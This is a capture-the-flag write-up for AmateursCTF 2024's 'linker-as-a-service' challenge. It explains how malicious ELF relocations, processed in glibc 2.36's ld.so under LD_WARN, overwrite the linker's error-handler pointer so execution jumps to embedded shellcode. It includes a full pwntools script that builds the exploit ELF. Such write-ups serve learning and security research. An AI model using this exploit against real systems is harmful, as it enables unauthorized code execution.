AmateursCTF 2024

Writeup of pwn/linker-as-a-service from AmateursCTF 2024.

overview

The server asks for an ELF file, ensures that it’s an amd64 shared object with the provided ld.so as its interpreter, and then runs it. Easy shell, right? But there’s a catch.

elf.run(env={
    "LD_TRACE_LOADED_OBJECTS": "1",
    "LD_WARN": "yes",
})

It’s run with environment variables that act as arguments to the linker.

LD_WARN (since glibc 2.1.3)
              If set to a nonempty string, warn about unresolved
              symbols.
LD_TRACE_LOADED_OBJECTS
              If set (to any value), causes the program to list its
              dynamic dependencies, as if run by ldd(1), instead of
              running normally.

The linker won’t transfer control to our ELF’s entry under this configuration. Before we go looking through glibc source to scope out our attack surface, let’s briefly introduce relocations, which are hinted at in the description.

relocations

Relocations within an ELF act as instructions to the linker to modify some memory at load time. A 64-bit rela (relocation with addend) entry has three fields.

typedef struct {
        Elf64_Addr      r_offset;
        Elf64_Xword     r_info;
        Elf64_Sxword    r_addend;
} Elf64_Rela;

r_offset specifies the virtual address of the memory to be modified, not including load bias. This limits us to modifying memory relative to where our ELF is mapped. r_info specifies both the type of the relocation and an associated symbol table index if applicable. r_addend specifies a constant addend to be used when computing the relocation.
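To make the layout concrete, here is a minimal sketch of packing one entry with Python's `struct` module. The helper names `elf64_r_info` and `pack_rela` are my own, not from the challenge or glibc. The symbol index sits in the upper 32 bits of `r_info` and the relocation type in the lower 32, mirroring the `ELF64_R_INFO` macro.

```python
import struct

def elf64_r_info(sym_index, reloc_type):
    """Combine a symbol table index and a relocation type into r_info."""
    return (sym_index << 32) | (reloc_type & 0xFFFFFFFF)

def pack_rela(r_offset, r_info, r_addend):
    """Serialize one little-endian Elf64_Rela entry (24 bytes)."""
    # r_offset and r_info are unsigned 64-bit, r_addend is signed 64-bit.
    return struct.pack("<QQq", r_offset, r_info, r_addend)

# Example values only: type 8 with no symbol, offset 0x1000, addend 0x600.
entry = pack_rela(0x1000, elf64_r_info(0, 8), 0x600)
print(len(entry), entry.hex())
```

Each entry is 24 bytes, which is the value the solve script later passes as DT_RELAENT.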

Relocation types are machine dependent and can get confusing, but for this challenge we only need two amd64 relocations. R_AMD64_64 is the relocation S + A, where S is the address of the resolved symbol named in r_info and A is the addend. R_AMD64_RELATIVE is the relocation B + A, where B is the base virtual address at which the ELF was actually mapped. This is important: ASLR randomizes our ELF base address, so relative relocs are what let us write pointers into memory that are still valid at run time.
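The two formulas can be sketched as a small Python model. This is not the linker's code, only the arithmetic: `reloc_target` and `reloc_value` are hypothetical helper names, and the base address below is an arbitrary example value.

```python
R_AMD64_64 = 1
R_AMD64_RELATIVE = 8
MASK64 = 0xFFFFFFFFFFFFFFFF

def reloc_target(base, r_offset):
    """Address that gets written: r_offset plus the load bias."""
    return (base + r_offset) & MASK64

def reloc_value(r_type, base, addend, sym_addr=None):
    """Value that gets written for the two relocation types used here."""
    if r_type == R_AMD64_RELATIVE:
        return (base + addend) & MASK64          # B + A
    if r_type == R_AMD64_64:
        if sym_addr is None:
            # Models a failed lookup; the real linker reports an error instead.
            raise LookupError("unresolved symbol")
        return (sym_addr + addend) & MASK64      # S + A
    raise ValueError("relocation type not modelled")

base = 0x7FFFF7FB0000  # example load address, assumed for illustration
print(hex(reloc_target(base, 0x1000)))
print(hex(reloc_value(R_AMD64_RELATIVE, base, 0x600)))
```

Note that both the target and the written value of a relative reloc move with the base, so neither requires knowing where ASLR placed the object.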

rtld

The ld.so we’re given is from glibc 2.36. The main source file we’re interested in is elf/rtld.c, which contains the code for the run time dynamic linker. Most of the important logic occurs in the dl_main function, and the first step of the process that we care about is shown in the following block of code.

  /* Load all the libraries specified by DT_NEEDED entries.  If LD_PRELOAD
     specified some libraries to load, these are inserted before the actual
     dependencies in the executable's searchlist for symbol resolution.  */
  {
    RTLD_TIMING_VAR (start);
    rtld_timer_start (&start);
    _dl_map_object_deps (main_map, preloads, npreloads,
			 state.mode == rtld_mode_trace, 0);
    rtld_timer_accum (&load_time, start);
  }

ELF shared objects are required to have a dynamic segment containing a list of tags that basically tell the linker what to do. A full description for each of these tags can be found here. DT_NEEDED tags specify the name of a shared object dependency. Before any relocations are processed, the linker recursively resolves these dependencies and maps them into memory.
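As a rough illustration of how DT_NEEDED entries are read, the sketch below walks a hand-built dynamic array and looks each name up in a string table. The function name `needed_names` and the toy tables are assumptions for the example. In a real file the string table is located through DT_STRTAB rather than passed in.

```python
import struct

DT_NULL = 0
DT_NEEDED = 1

def needed_names(dynamic, dynstr):
    """Return the names referenced by DT_NEEDED tags, in order."""
    names = []
    # Each Elf64_Dyn is 16 bytes: a signed 64-bit tag and a 64-bit value.
    for off in range(0, len(dynamic), 16):
        tag, val = struct.unpack_from("<qQ", dynamic, off)
        if tag == DT_NULL:
            break  # DT_NULL terminates the array
        if tag == DT_NEEDED:
            end = dynstr.index(b"\x00", val)  # val is an offset into dynstr
            names.append(dynstr[val:end].decode())
    return names

# Toy tables: one dependency followed by the terminator.
dynstr = b"\x00libc.so.6\x00"
dynamic = struct.pack("<qQ", DT_NEEDED, 1) + struct.pack("<qQ", DT_NULL, 0)
print(needed_names(dynamic, dynstr))
```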

Because we were graciously provided an ld.so with debug info, we can break on the corresponding line of code in gdb and see what happens after calling _dl_map_object_deps. I’ll also note here that for debugging this challenge, I used a small wrapper program and patchelf’d it to use the linker we were provided, which made gdb automatically resolve the debug symbols. You do, however, need to run catch syscall execve and continue past it before setting linker breakpoints; otherwise they trigger on the linker’s first run, for the wrapper program itself. There’s probably a better method, so let me know if I could improve this.

#include <unistd.h>
char *path = "./chal";
int main() { 
	char *args[] = {path, 0};
	char *envp[] = {"LD_TRACE_LOADED_OBJECTS=1", "LD_WARN=yes", 0};
	execve(path, args, envp);
}

We’ll run a test ELF with a DT_NEEDED tag for libc.so.6 and print mappings.

Start              Perm Path
0x0000555555554000 r-x /home/enzo/ctf/am24/linker-as-a-service/chal
0x00007ffff7de2000 r-- /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7e08000 r-x /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7f5d000 r-- /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7fb0000 rw- /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7fb6000 rw- 
0x00007ffff7fc5000 r-- [vvar]
0x00007ffff7fc9000 r-x [vdso]
0x00007ffff7fcb000 r-- /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
0x00007ffff7fcc000 r-x /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
0x00007ffff7ff1000 r-- /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
0x00007ffff7ffb000 rw- /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
0x00007ffffffde000 rw- [stack]
0xffffffffff600000 --x [vsyscall]

Notice that our original ELF is mapped separately from the linker, far away in the address space, but libc.so.6 is mapped adjacent to it. This is an interesting characteristic that will be helpful later.
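The difference is easy to quantify from the listing. The sketch below copies three rows from the output above and compares distances; `first_start` is a hypothetical helper, and the addresses are the ones from my debugging session, so they say nothing by themselves about the layout on the remote.

```python
listing = """\
0x0000555555554000 r-x /home/enzo/ctf/am24/linker-as-a-service/chal
0x00007ffff7de2000 r-- /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7fcb000 r-- /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
"""

def first_start(text, suffix):
    """Start address of the first mapping whose path ends with suffix."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 3 and fields[2].endswith(suffix):
            return int(fields[0], 16)
    raise KeyError(suffix)

chal = first_start(listing, "/chal")
libc = first_start(listing, "/libc.so.6")
ld = first_start(listing, "/ld-linux-x86-64.so.2")

print("libc -> ld.so:", hex(ld - libc))
print("chal -> ld.so:", hex(ld - chal))
```

The first distance is under two megabytes, while the second spans terabytes of address space, which is the gap ASLR randomizes.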

warn

Once the linker has mapped dependencies, its job with regard to LD_TRACE_LOADED_OBJECTS is basically done. There is no need to perform relocations. Let’s look at the code for handling this.

  if (__glibc_unlikely (state.mode != rtld_mode_normal))
    {
      /* We were run just to list the shared libraries.  It is
	 important that we do this before real relocation, because the
	 functions we call below for output may no longer work properly
	 after relocation.  */

We’ll first be taken down a path that prints dependencies, and at the end of the if statement exit is called. So where is our attack surface?

 /* If LD_WARN is set, warn about undefined symbols.  */
	  if (GLRO(dl_lazy) >= 0 && GLRO(dl_verbose))
	    {
	      /* We have to do symbol dependency testing.  */
	      struct relocate_args args;
	      unsigned int i;

	      args.reloc_mode = ((GLRO(dl_lazy) ? RTLD_LAZY : 0)
				 | __RTLD_NOIFUNC);

LD_WARN being set wasn’t without purpose. As we saw earlier, it warns us about unresolved symbols, and the only way the linker can do that is by processing our ELF’s relocations.

	      i = main_map->l_searchlist.r_nlist;
	      while (i-- > 0)
		{
		  struct link_map *l = main_map->l_initfini[i];
		  if (l != &GL(dl_rtld_map) && ! l->l_faked)
		    {
		      args.l = l;
		      _dl_receive_error (print_unresolved, relocate_doit,
					 &args);
		    }
		}
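The loop above walks the list from the last entry back to the first and skips the linker's own map. A toy Python model of just that iteration order follows. The list contents are an assumed example, the `l_faked` check is left out, and `relocation_order` is a name made up for this sketch.

```python
def relocation_order(initfini, rtld_name="ld.so"):
    """Names in the order the warn path would hand them to relocate_doit."""
    order = []
    i = len(initfini)
    while i > 0:          # same shape as `while (i-- > 0)` in the C code
        i -= 1
        name = initfini[i]
        if name != rtld_name:
            order.append(name)
    return order

# Assumed layout: main program first, then one dependency, then the linker.
print(relocation_order(["chal", "libc.so.6", "ld.so"]))
```

Under that assumption the dependency is relocated before the main program.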

Now we have a clear goal: corrupt some memory in the linker using bad relocations to hijack control flow before the linker exits.

corruption

There aren’t many sanity checks on relocations. We can supply an out-of-bounds offset and the address it points to will get written. The problem here is ASLR. As we saw earlier, our ELF and the linker are mapped in separate relative spaces, so the offset between the two is randomized. A potential way around this is to use self-modifying relocs, but there was an explicit check that prevented this in the server’s ELF processing, so we’ll need to find another way.

Recall that when we set a DT_NEEDED for libc.so.6, it was mapped adjacent to the linker. What happens if we map our own executable, which we can do using /proc/self/exe? Well, as expected, it will also get mapped adjacent to the linker. And our mapped self will have its relocs processed first, effectively bypassing the issue with ASLR. We now have arbitrary write into the linker’s memory.
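Here is a toy model of why adjacency is enough. It treats the region holding our second copy and the linker as one flat buffer and applies a single B + A relocation whose offset points past our own object. All addresses and the 0x30000 distance are invented for the example, and `apply_relative` is not a glibc function.

```python
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF

def apply_relative(memory, region_start, base, r_offset, addend):
    """Store base + addend at base + r_offset inside a flat memory model."""
    target = base + r_offset  # nothing limits this to the object's own pages
    struct.pack_into("<Q", memory, target - region_start, (base + addend) & MASK64)

# Hypothetical layout: our copy starts the region, linker data sits 0x30000 later.
region_start = 0x7FFFF7F00000
memory = bytearray(0x40000)
copy_base = region_start
linker_slot = region_start + 0x30000  # stand-in for a pointer in the linker's data

# The distance to the slot is fixed, so r_offset can be chosen ahead of time.
apply_relative(memory, region_start, copy_base, linker_slot - copy_base, 0x600)

(written,) = struct.unpack_from("<Q", memory, linker_slot - region_start)
print(hex(written))
```

The slot ends up holding `copy_base + 0x600`, a valid pointer into our own mapping, even though neither address was known when the ELF was built.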

From here, there are multiple methods to gain PC control. The author of the challenge modified the audit state of the linker, but I found a simple function pointer we can overwrite directly. The unresolved symbol warnings are performed by the call below.

_dl_receive_error(print_unresolved, relocate_doit, &args)

print_unresolved will be assigned to a linker variable called receiver, and _dl_lookup_symbol_x will call _dl_signal_cexception if the symbol can’t be resolved, which will jump to the address in receiver. We can use a relative reloc to overwrite receiver with the address of our own ELF in memory and supply an addend so it jumps to a location containing our shellcode. We will additionally need to supply another reloc that attempts to look up an unresolvable symbol to trigger the exception handler. When performed successfully, the stack trace will look as follows, with rip pointing to the address of our ELF in the linker relative memory space.

elf crafting

Putting this all together into an ELF takes a little bit of work. I haven’t found an ELF library I enjoy yet, so I wrote everything from scratch in Python. My solve script to generate the ELF is provided below.

#!/usr/bin/env python3

from pwn import *

context.arch = "amd64"

DT_NULL = 0
DT_NEEDED = 1
DT_STRTAB = 5
DT_SYMTAB = 6
DT_RELA = 7
DT_RELASZ = 8
DT_RELAENT = 9
DT_SYMENT = 11
R_AMD64_64 = 1
R_AMD64_RELATIVE = 8

def ehdr(entry):
    h = b"\x7fELF"
    h += p8(2)
    h += p8(1)
    h += p8(1)
    h += p8(0)
    h += p64(0)
    h += p16(3)
    h += p16(0x3e)
    h += p32(1)
    h += p64(entry)
    h += p64(0x40)
    h += p64(shoff)
    h += p32(0)
    h += p16(0x40)
    h += p16(0x38)
    h += p16(phnum)
    h += p16(0x40)
    h += p16(shnum)
    h += p16(1)
    return h

def phdr(ptype, data, off=-1):
    global totalsz, edata, phdrs
    h = p32(ptype)
    h += p32(5)
    if off != -1:
        h += p64(off)*3
    else:
        h += p64(totalsz)*3
    h += p64(len(data))
    h += p64(len(data))
    h += p64(0)
    if off == -1:
        edata += data
        totalsz += len(data)
    phdrs += h

def shdr(name, stype, flags, data, link=0):
    global totalsz, edata, shdrs
    h = p32(shstridx[name])
    h += p32(stype)
    h += p64(flags)
    h += p64(0)
    h += p64(totalsz)
    h += p64(len(data)) 
    h += p32(link)
    h += p32(0)
    h += p64(0)
    if stype == 4 or stype == 2:
        h += p64(24)
    else:
        h += p64(0)
    edata += data
    totalsz += len(data)
    shdrs += h

def dtag(tag, val):
    global dtags
    dtags += p64(tag)+p64(val)

def rela(off, inf, add):
    return p64(off)+p64(inf)+p64(add)

def symb(name, inf, vis, idx, val, size):
    return p32(name)+p8(inf)+p8(vis)+p16(idx)+p64(val)+p64(size)

phnum = 4
shnum = 8
shoff = 0x40 + 0x38*phnum
totalsz = 0x40 + 0x38*phnum + 0x40*shnum
edata = b""
phdrs = b""
shdrs = b""
dtags = b""
shstr = [
    b"",
    b".shstrtab",
    b".strtab",
    b".dynstr",
    b".dynsym",
    b".rela.dyn",
    b".dynamic",
    b".interp",
]
dynstr = [
    b"idontexist",
    b"/proc/self/exe",
]
shstrtab = b""
shstridx = []
for s in shstr:
    shstridx.append(len(shstrtab))
    shstrtab += s + b"\x00"
dynstridx = []
dynstrtab = b""
for s in dynstr:
    dynstridx.append(len(dynstrtab))
    dynstrtab += s + b"\x00"
strtab = b"\x00"

dtag(DT_SYMENT, 24)
# map ourselves with /proc/self/exe
dtag(DT_NEEDED, dynstridx[1])
shdr(0, 0, 0, b"")
shdr(1, 3, 0, shstrtab)
shdr(2, 3, 0, strtab)
dtag(DT_STRTAB, totalsz)
shdr(3, 3, 3, dynstrtab)
# just need one symbol that doesn't exist
dtag(DT_SYMTAB, totalsz)
shdr(4, 2, 3, symb(10, (1<<4)|2, 0, 0, 0, 0), 3)

# this offset from ELF base to linker memory can differ
offset = 0x36218
if args.GDB:
    offset += 0x6000
# first reloc to overwrite `receiver` in linker memory with an address to code in our ELF.
# second reloc with unresolvable symbol to trigger _dl_signal_cexception, which
# will call receiver function pointer, which is supposed to be print_unresolved,
# but will now just jump to our own code and spawn a shell
reladyn = rela(offset, R_AMD64_RELATIVE, 0x600) + rela(0, R_AMD64_64, 0x600)
dtag(DT_RELA, totalsz)
dtag(DT_RELASZ, len(reladyn))
dtag(DT_RELAENT, 24)
shdr(5, 4, 3, reladyn)
dynoff = totalsz
dtag(DT_NULL, 0)
shdr(6, 6, 3, dtags, 3)

interp = totalsz
ldpath = b"./ld-linux-x86-64.so.2\x00".ljust(43, b"\x00")
if args.REMOTE:
    ldpath = b"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\x00".ljust(43, b"\x00")
shdr(7, 1, 0, ldpath)

phdr(6, b"A"*0x38*phnum, off=0x40)
phdr(1, b"A"*(0x38*phnum+0x40*shnum+totalsz+0x400), off=0x40)
phdr(3, ldpath, interp)
phdr(2, dtags, dynoff)
# linker will jump to this code
edata += b"\x90"*0x200 + asm(shellcraft.amd64.linux.sh())

e = ehdr(0) + phdrs + shdrs + edata
with open("chal", "wb") as f:
    f.write(e)

And here’s a picture of it working. This was a very creative and fun challenge, huge props to the author unvariant.